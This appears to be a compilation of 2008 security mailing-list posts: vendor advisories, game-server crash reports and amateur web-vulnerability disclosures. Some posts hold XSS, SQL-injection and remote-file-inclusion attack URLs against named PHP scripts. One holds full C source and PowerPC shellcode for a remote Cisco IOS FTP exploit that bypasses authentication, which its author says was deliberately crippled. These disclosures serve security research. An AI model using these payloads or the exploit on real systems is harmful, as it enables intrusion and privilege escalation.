Citrix MetaFrame Privilege Escalation
INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY http://www.intruders.com.br/ http://www.security.org.br/ ADVISORY/1907 - Citrix MetaFrame Privilege Escalation PRIORITY: Low I - INTRUDERS: Intruders Tiger Team Security (http://www.intruders.com.br/) is a SecurityLabs (http://www.security.org.br) division. The Intruders Tiger Team Security (ITTS) is a group of researchers with more than 10 years of experience, specialized in the development of penetration tests. All the penetration tests realized until the moment by the Intruders Tiger Team Security had 100% of success. II - INTRODUCTION: -- Citrix Presentation Server formerly know as Citrix MetaFrame Server is a remote application publishing product that allows people to connect to applications available from central servers. One advantage of publishing applications using Presentation Server is that lets people connect to those applications remotely, from their homes, airport Internet kiosks, smart phones, and other devices outside of their corporate networks. >From an end-user perspective, users can log in to their corporate network from, for example, an airport kiosk, see all of the applications they would see everyday at work, including Outlook email and any internal applications and access them from the kiosk in a secure environment. III - DESCRIPTION: -- Intruders Tiger Team Security identified an unknown vulnerability in Citrix Metaframe Presentation Server and Citrix Metaframe XP. The icabar.exe file which is designed to startup the Citrix MetaFrame administration toolbar allows an attacker to escalate privilege in Windows 2000 and below in the default configuration and in Windows 2003 in some special circumstances. IV - ANALISYS: --- The icabar.exe file does launch during an administrator logon to the desktop via RUN registry key. Unfortunately the IcaBar key value doesn't have a full binary path, which allows an attacker to escalate privilege in Windows NT, 2000 in the default configuration and in Windows 2003 in some circumstances. This causes several instances of Windows PATH trolling, where Windows tries to locate the icabar.exe file in the directories listed in its PATH environment variable. If the attacker is able to write in any of this directories listed in its PATH before the Citrix Metaframe PATH entry, so the attacker can escalate privilege. The standard file ACL (Access Control List) of Windows NT and 2000 Operating Systems is weak and allow any user to create files in the SystemDrive (in general c:\) and in many directorys listed in its PATH, which allow an attacker to create a fake icabar.exe and consequently escalate privilege. However, the exploitation dependends from others softwares or administrators whom added new PATH entrys, for example the common "%SystemDrive%\Program Files\SomeDirectory", where the directory is set to Everyone/Full Control (default in Windows 2000) or directorys which allows the creation and modification of new files by local Users group (special permissions set by Windows 2003). As described in the document CTX106052 (http://support.citrix.com/kb/entry.jspa?entryID=6032), the Citrix company created a Hotfix for MetaFrame Presentation Server 3.0 and a workaround for MetaFrame XP, because Windows 2003 SP1 doesn't allow anymore the startup via RUN registry key without full path. However this patch from Citrix company doesn't enquote the binary full path stored in the RUN registry key, an attacker can abuse of the old 8.3 notation in the binary search and consequently can be used to escalate privilege in some circumstances. V. DETECTION: - Intruders Tiger Team Security confirmed the existence of this vulnerability in the following Citrix Metaframe versions: - Citrix MetaFrame Presentation Server 3.0 and below. - Citrix MetaFrame XP 1.0 and below. Possibly new(s) version(s) can be vulnerable also. VI. SUGESTION: -- There is no manufacture patch. WORKAROUND: Use full path binary and enquote the IcaBar key stored in the RUN registry key. VII - CHRONOLOGY: - 03/07/2005 - Vulnerability discovered during a Penetration Test. 07/19/2007 - Citrix Metaframe World Wide Team Contacted. 07/22/2007 - Citrix Metaframe World Wide Team Contacted - Second notification. 07/24/2007 - Citrix security staff - Investigating the possible flaw. 08/15/2007 - Citrix security staff - Have confirmed that this issue is valid and are currently scoping the effort required to address it on all affected platforms. 08/17/2007 - Citrix security staff - Currently do not have an accurate estimate of how long it will take to roll out the public response. 09/17/2007 - Citrix security staff - Investigation into the full scope of the issue you reported with the icabar.exe is not yet complete. At this point though, we are performing due diligence to find any similar issues that might exist in this
DEV WMS Multiple Vulnerabilities
Script : DEV WMS Type : Multiple Vulnerabilities ( Local file inclusion / Cross Site Scripting / SQL Injection ) Alert : High Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Script Download : http://dev-wms.sourceforge.net/ XSS Vulnerability 1 : Variable Sent Method : GET Vulnerable Variable : session Address : http://Example.com/?session=";>><>>alert(document.cookie) Solution : filter session variable with htmlspecialchars() function ... Xss Vulnerability 2 : Variable Sent Method : POST Vulnerable Variable : kluc Address : http://Example.com/index.php?session=0&action=search change example.com to script address in a real site and save as ircrash.html , open file with browser and see your cookie . http://Example.com/index.php?session=0&action=search"; method="POST" name="form"> Solution : filter kluc variable with htmlspecialchars() function ... SQL Injection : Method Of Send : GET Vulnerable Variable : article Address : http://Example.com/index.php?session=0&action=read&click=open&article=[SQL CODE] Solution : Filter danger caracter for article variable ... Local file inclusion : Method Of Send : GET Vulnerable Variable : step Address : http://Example.com/admin/index.php?start=install&step=file.type%00 Solution : Filter step variable with if function ... Tnx : God HTTP://IRCRASH.COM
[ MDVSA-2008:158 ] silc-toolkit
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:158 http://www.mandriva.com/security/ ___ Package : silc-toolkit Date: July 30, 2008 Affected: 2008.0 ___ Problem Description: A vulnerability was found in the SILC toolkit before version 1.1.5 that allowed a remote attacker to cause a denial of service (crash), or possibly execute arbitrary code via long input data (CVE-2008-1227). A vulnerability was found in the SILC toolkit before version 1.1.7 that allowed a remote attacker to execute arbitrary code via a crafted PKCS#2 message (CVE-2008-1552). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1227 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1552 ___ Updated Packages: Mandriva Linux 2008.0: 35e5d87de2aff27596270ae9e55ca8dd 2008.0/i586/libsilc-1.1_2-1.1.2-2.1mdv2008.0.i586.rpm efaac773338d54d32b51b0d53e55483b 2008.0/i586/libsilcclient-1.1_2-1.1.2-2.1mdv2008.0.i586.rpm 873726229e4b414b8c422b424edd2dcc 2008.0/i586/silc-toolkit-1.1.2-2.1mdv2008.0.i586.rpm a1c102dd0788cc8ef7f48aa6bea26331 2008.0/i586/silc-toolkit-devel-1.1.2-2.1mdv2008.0.i586.rpm 08dfd9be2c32c9ebac8da73803f62c6f 2008.0/SRPMS/silc-toolkit-1.1.2-2.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 07b24c79c06810497cf581e7eeb06a11 2008.0/x86_64/lib64silc-1.1_2-1.1.2-2.1mdv2008.0.x86_64.rpm 29075aa71e7e63b02e54001610facfea 2008.0/x86_64/lib64silcclient-1.1_2-1.1.2-2.1mdv2008.0.x86_64.rpm 79d595aeb0f9764d6b5563097f7e958c 2008.0/x86_64/silc-toolkit-1.1.2-2.1mdv2008.0.x86_64.rpm 855026158877e6963e81d4d1ab95f6f6 2008.0/x86_64/silc-toolkit-devel-1.1.2-2.1mdv2008.0.x86_64.rpm 08dfd9be2c32c9ebac8da73803f62c6f 2008.0/SRPMS/silc-toolkit-1.1.2-2.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIkIxKmqjQ0CJFipgRAnBmAJ4psfbA7p2U1Rhz/5cZfzYumei50gCfdKNU dywXt33a4KyNAkhSPCwcNgE= =AG6M -END PGP SIGNATURE-
Cisco IOS shellcode explanation - additional
Anyone spot the typo? It's also in a comment in the exploit source, but doesn't affect how the code works: "addi7,7,233" should read "addi7,7,2330" The first offset (requirement to authenticate) is at 0x174 and the second (privilege level) is at 0xde4 Its worth noting that at some stage around IOS 12.4 this structure changed slightly and therfore if you were planning on exploiting 12.4(7a) which is also vulnerable to the FTP stack overflow, the offsets are 0x17c and 0xdec Cheers, Andy On Wed, Jul 30, 2008 at 10:03 AM, Andy Davis <[EMAIL PROTECTED]> wrote: > Hi, > > Lots of people have been asking for details about the slightly > unorthodox shellcode I used within the IOS FTP exploit, so here goes: > > .equ vty_info, 0x8182da60 //contains a pointer to the VTY info structure > .equ terminate, 0x80e4086c > > lis 4,[EMAIL PROTECTED] > la 4,[EMAIL PROTECTED](4) > xor 8,8,8//Clear r8 > lwzx7,4,8//Get pointer to VTY info structure > stw 8,372(7) //Write zero to first offset to remove > //the requirement to enter a password > subi8,8,1//Set r8 to be 0x > addi7,7,233 //Add second offset in two steps to > //avoid nulls in the shellcode > stw 8,1226(7)//Write 0x to second offset to > //priv escalate to level 15 > //(technically this should be 0xff10 > //but 0x works and is more efficient) > mr 3,8 //Use 0x as a parameter > //to pass to terminate() > lis 4,[EMAIL PROTECTED] > la 4,[EMAIL PROTECTED](4) > mtctr 4 > bctr //terminate "this process" > //(current connection to the FTP server) > > > Cheers, > > Andy >
Tool: PorkBind Nameserver Security Scanner
In light of the new DNS cache poisoning issue and now that everyone has had plenty of time to apply patches, I've decided to release a new version of my nameserver security scanner called porkbind. It is a multi-threaded nameserver scanner that can recursively query nameservers of subdomains for version strings. (i.e. sub.host.dom's nameservers then host.dom's nameservers) After acquiring the version strings it tests them against version numbers from CERT advisories and reports back to the user. Zone transfer capability is also tested for. It is available for download at: http://innu.org/~super/tools/porkbind-1.2.tar.gz - Derek
RealNetworks RealPlayer ActiveX Illegal Resource Reference Vulnerability
RealNetworks RealPlayer ActiveX Illegal Resource Reference Vulnerability by cocoruder(frankruder_at_hotmail.com) http://ruder.cdut.net Summary: An illegal resource reference vulnerability exists in the ActiveX Control of RealNetworks RealPlayer. For exploiting the vulnerability, the attacker may build a special web page and entrap the victim into visiting it, if the local system has installed RealPlayer, the local resources (or any other illegal resources) will be accessed. This vulnerability may assist in exploitation of other vulnerabilities. Affected Software Versions: RealPlayer 10.6 and previous versions (other versions may also be affected) Details: Currently there is no details released. Solution: The vendor has fixed this vulnerability, the vendor's advisory is available on: http://service.real.com/realplayer/security/07252008_player/en/ CVE Information: CVE-2008-3064 Disclosure Timeline: 2006.12.19Vendor notified 2006.12.20Vendor responded 2008.07.23Notified by the vendor that patch and advisory were coming 2008.07.25Vendor's advisory released 2008.07.29Advisory released --EOF--
MJGuest 6.8 GT Cross Site Scripting Vulnerability
Script : MJGuest 6.8 GT
Type : Cross Site Scripting Vulnerability
Alert : Medium
Discovered by : Khashayar Fereidani
Our Team : IRCRASH
My Official Website : HTTP://FEREIDANI.IR
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
Script Download : http://www.mdsjack.bo.it/files/mjguest_6.8gt.zip
XSS Vulnerability :
Invalid Code : ./guestbook.js.php => document.write('' + '' + '');
Vulnerable variable : link
Address : http://Example/guestbook.js.php?link=[XSS]
Solution : Filter link variable with htmlsepcialchars() function .
Tnx : God
HTTP://IRCRASH.COM
NULL pointer in Unreal Tournament 2004 v3369
### Luigi Auriemma Application: Unreal Tournament 2004 http://www.unrealtournament2003.com/ut2004/index.html Versions: <= v3369 Platforms:Windows and Linux Bug: NULL pointer Exploitation: remote, versus server Date: 30 Jul 2008 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bug 3) The Code 4) Fix ### === 1) Introduction === Unreal Tournament 2004 is a well known FPS game developed by Epic Games (http://www.epicgames.com) and released at the beginning of the 2004. ### == 2) Bug == Through a specific sequence of packets an attacker is able to crash the UT2004 server due to a NULL pointer exception. ### === 3) The Code === http://aluigi.org/poc/ut2004null.zip ### == 4) Fix == No fix ### --- Luigi Auriemma http://aluigi.org http://backup.aluigi.org http://mirror.aluigi.org
HIOX Browser Statistics 2.0 Remote File Inclusion Vulnerability
HIOX Browser Statistics 2.0 Remote File Inclusion Vulnerability Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :) [~] Found by : Ghost Hacker - R-H Team - |, .-. .-. ,| [~] My Blog : http://gh0st10.wordpress.com | )(_o/ \o_)( | [~] My Email : [EMAIL PROTECTED] |/ /\ \| [~] Name Script : HIOX Browser Statistics 2.0 [~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip #[ I love the Messenger of Allah Mohammad ]# [~] Error (hioxupdate.php + hioxstats.php) : include "$hm/browser.php"; [~] Exploit : http://.com/[path]/hioxupdate.php?hm=Evil_Code http://.com/[path]/hioxstats.php?hm=Evil_Code #[ I love the Messenger of Allah Mohammad ]# [~] Greetz : Mr.SaFa7 & RoMaNcYxHaCkEr & Night Mare & Root Hacker & Dmar al3noOoz , All Members Real Hack & Members Arabs Security And All My Friends , Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :) _ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
HIOX Random Ad 1.3 (hioxRandomAd.php hm) RFI Vulnerability
HIOX Random Ad 1.3 (hioxRandomAd.php hm) RFI Vulnerability Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :) [~] Found by : Ghost Hacker - R-H Team - |, .-. .-. ,| [~] My Blog : http://gh0st10.wordpress.com | )(_o/ \o_)( | [~] My Email : [EMAIL PROTECTED] |/ /\ \| [~] Name Script : HIOX Random Ad 1.3 [~] Download : http://www.hscripts.com/scripts/php/downloads/HRA_1_3.zip #[ I love the Messenger of Allah Mohammad ]# [~] Error (hioxRandomAd.php) : include "$hm/admin/props.php"; [~] Exploit : http://.com/[path]/hioxRandomAd.php?hm=Evil_Code #[ I love the Messenger of Allah Mohammad ]# [~] Greetz : Mr.SaFa7 & Night Mare & Root Hacker & Dmar al3noOoz , All Members Real Hack & Members Arabs Security And All My Friends , Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :) _ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
RE: Remote Cisco IOS FTP exploit
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hello,
This is Paul Oxman with Cisco PSIRT.
The Cisco published advisory that Andy references is
located at:
http://www.cisco.com/warp/public/707/cisco-sa-20070509-iosftp.shtml
Regards
Name:Paul Oxman
Phone: +65 6317 7418
Mobile: +65 9111 0157
Title: PSIRT Incident Manager
PGP Key: 0x6EA839A6
Have you seen the new Cisco Security Center yet?
http://www.cisco.com/security
- -Original Message-
From: Andy Davis [mailto:[EMAIL PROTECTED]
Sent: Tuesday, 29 July 2008 6:31 PM
To: bugtraq@securityfocus.com
Subject: Remote Cisco IOS FTP exploit
Hi,
The IOS FTP server vulnerabilities were published in an advisory by
Cisco in May 2007. The FTP server does not run by default, it is not
widely used and has since been removed from new versions of IOS.
Therefore, I took the decision to release this exploit code in order
to show that IOS can be reliably exploited to provide remote level 15
exec shell access. This clearly demonstrates that patching your
router
is just as important as patching your servers.
To prevent its widespread abuse I have omitted a critical step which
means that it will only work when the router is connected to a
debugger - not something you are likely to encounter on the Internet
Anyway, hopefully this will promote further IOS security research as
there's plenty left to look at!
Cheers,
Andy
/*
Cisco IOS FTP server remote exploit by Andy Davis 2008
Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007
Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router
Removes the requirement to authenticate and escalates to level 15
*
To protect the innocent a critical step has been omitted, which
means
the shellcode will only execute when the router is attached to gdb.
I'm sure the PowerPC shellcoders out there will work it out...
*
Thanks to Gyan Chawdhary and Varun Uppal for all the hours they
spent
on the original IOS security research
iosftpexploit googlemail 'dot' com
*/
#include
#include
#include
#include
#define PORT 21
int main(int argc, char **argv)
{
unsigned char sendbuf[] =
"MKD "
/* .equ vty_info, 0x8182da60# pointer to VTY info */
/* .equ terminate, 0x80e4086c # kill a process */
"\x3c\x80\x81\x83" /* lis 4,[EMAIL PROTECTED] */
"\x38\x84\xda\x60" /* la 4,[EMAIL PROTECTED](4) */
"\x7d\x08\x42\x78" /* xor 8,8,8 */
"\x7c\xe4\x40\x2e" /* lwzx7,4,8 */
"\x91\x07\x01\x74" /* stw 8,372(7) */
"\x39\x08\xff\xff" /* subi8,8,1 */
"\x38\xe7\x09\x1a" /* addi7,7,233 */
"\x91\x07\x04\xca" /* stw 8,1226(7) */
"\x7d\x03\x43\x78" /* mr 3,8 */
"\x3c\x80\x80\xe4" /* lis 4,[EMAIL PROTECTED] */
"\x38\x84\x08\x6c" /* la 4,[EMAIL PROTECTED](4) */
"\x7c\x89\x03\xa6" /* mtctr 4 */
"\x4e\x80\x04\x20" /* bctr*/
/* exists cleanly without adversely affecting the FTP server */
"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */
"\x61\x61\x61\x61" /* padding */
"\x80\x06\x23\xB8" /* return address */
"\x0d\x0a";
/* trampoline code */
/* when the overflow occurs r26+0x14 points to the shellcode */
/*
0x800623B8 lwz 26, 20(26)
0x800623BC mtctr 26
0x800623C0 mr 3, 27
0x800623C4 bctrl
*/
unsigned char recvbuf[256];
struct sockaddr_in servaddr;
int s;
if (argc != 2)
{
printf ("\nCisco IOS FTP server remote exploit by Andy Davis
2008\n");
printf ("\nUsage: %s \n",argv[0]);
exit(-1);
}
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = inet_addr(argv[1]);
servaddr.sin_port = htons(PORT);
s = socket(AF_INET, SOCK_STREAM, 0);
connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr));
printf ("\nCisco IOS FTP server remote exploit by Andy Davis
2008\n");
printf ("Specific offsets for IOS 12.3(18) on a 2621XM router\n\n");
printf ("Sending exploit...\n\n");
if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0)
{
printf("Error sending packet...quitting\n\n");
exit (1);
}
recv (s, recvbuf, sizeof(recvbuf)-1,0);
printf ("Now telnet to the router for a shell...\n\n");
}
-BEGIN PGP SIGNATURE-
Version: PGP 8.1
iQA/AwUBSJAKwPOp/xnPFP7gEQLWogCaA0m3ex0cupS0QEHsyPpWsfnGcqoAn0Ua
fVdMozEjWSONap4CwIpMNznt
=Hchp
-END PGP SIGNATURE-
Memory corruption and NULL pointer in Unreal Tournament III 1.2
### Luigi Auriemma Application: Unreal Tournament III http://www.unrealtournament3.com Versions: <= 1.2 and 1.3beta4 Platforms:Windows (tested), Linux, PS3 and Xbox360 Bugs: A] memory corruption B] NULL pointer Exploitation: remote, versus server Date: 30 Jul 2008 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bugs 3) The Code 4) Fix ### === 1) Introduction === Unreal Tournament III is the latest game (2007) of the Unreal series created by Epic Games (http://www.epicgames.com). ### === 2) Bugs === A] memory corruption UT3 is affected by a problem in the handling of a specific type of packet. In this particular type of packet there is a 16 bit field which specifies the size of the data that follows and if this string is longer than about 172 bytes a memory corruption will occur allowing an attacker to control various registers which could allow the execution of malicious code. --- B] NULL pointer --- If the amount of data about I talked previously is bigger than the total size of the packet the string will not be read and a NULL pointer exception will occur. This type of bug is easily recognizable on the server because the message "Error: Attempted to multiply free a voice packet" is displayed before the crash when the malformed packet is received. ### === 3) The Code === http://aluigi.org/poc/ut3mendo.zip ### == 4) Fix == No fix ### --- Luigi Auriemma http://aluigi.org http://backup.aluigi.org http://mirror.aluigi.org
HIOX Star Rating System 1.0 Remote File Inclusion Vulnerability
HIOX Star Rating System 1.0 Remote File Inclusion Vulnerability Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :) [~] Found by : Ghost Hacker - R-H Team - |, .-. .-. ,| [~] My Blog : http://gh0st10.wordpress.com | )(_o/ \o_)( | [~] My Email : [EMAIL PROTECTED] |/ /\ \| [~] Name Script : HIOX Star Rating System 1.0 [~] Download : http://www.hscripts.com/scripts/php/downloads/HSRS.zip #[ I love the Messenger of Allah Mohammad ]# [~] Error (addcode.php) : include "$hm/auth/config.php"; [~] Exploit : http://.com/[path]/addcode.php?hm=Evil_Code #[ I love the Messenger of Allah Mohammad ]# [~] Greetz : Mr.SaFa7 & RoMaNcYxHaCkEr & Night Mare & Root Hacker & Dmar al3noOoz , All Members Real Hack & Members Arabs Security And All My Friends , Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :) _ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Cisco IOS shellcode explanation
Hi, Lots of people have been asking for details about the slightly unorthodox shellcode I used within the IOS FTP exploit, so here goes: .equ vty_info, 0x8182da60 //contains a pointer to the VTY info structure .equ terminate, 0x80e4086c lis 4,[EMAIL PROTECTED] la 4,[EMAIL PROTECTED](4) xor 8,8,8//Clear r8 lwzx7,4,8//Get pointer to VTY info structure stw 8,372(7) //Write zero to first offset to remove //the requirement to enter a password subi8,8,1//Set r8 to be 0x addi7,7,233 //Add second offset in two steps to //avoid nulls in the shellcode stw 8,1226(7)//Write 0x to second offset to //priv escalate to level 15 //(technically this should be 0xff10 //but 0x works and is more efficient) mr 3,8 //Use 0x as a parameter //to pass to terminate() lis 4,[EMAIL PROTECTED] la 4,[EMAIL PROTECTED](4) mtctr 4 bctr //terminate "this process" //(current connection to the FTP server) Cheers, Andy
shoutbox Remote Database Dawnload Exploit
## shoutbox Remote Database Dawnload Exploit Ghost Hacker , R-h Team , Real Hack We Will Be Back Soon :) ## [~] Found by : Ghost Hacker|, .-. .-. ,| [~] HomePage : http://gh0st10.wordpress.com| )(_o/ \o_)( | [~] My Email : [EMAIL PROTECTED] |/ /\ \| [~] Name Script : shoutbox [~] Download : http://www.designplace.org/download.php?file=shoutbox.zip ## [~] Exploit : http://.com/[path]/db/shoutdb.mdb ## [~] Greetz : Mr.SaFa7 & RoMaNcYxHaCkEr & Night Mare & All Members Real Hack & Arabs Security And All My Friends ## Viva Real hack Viva Real hack ## _ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
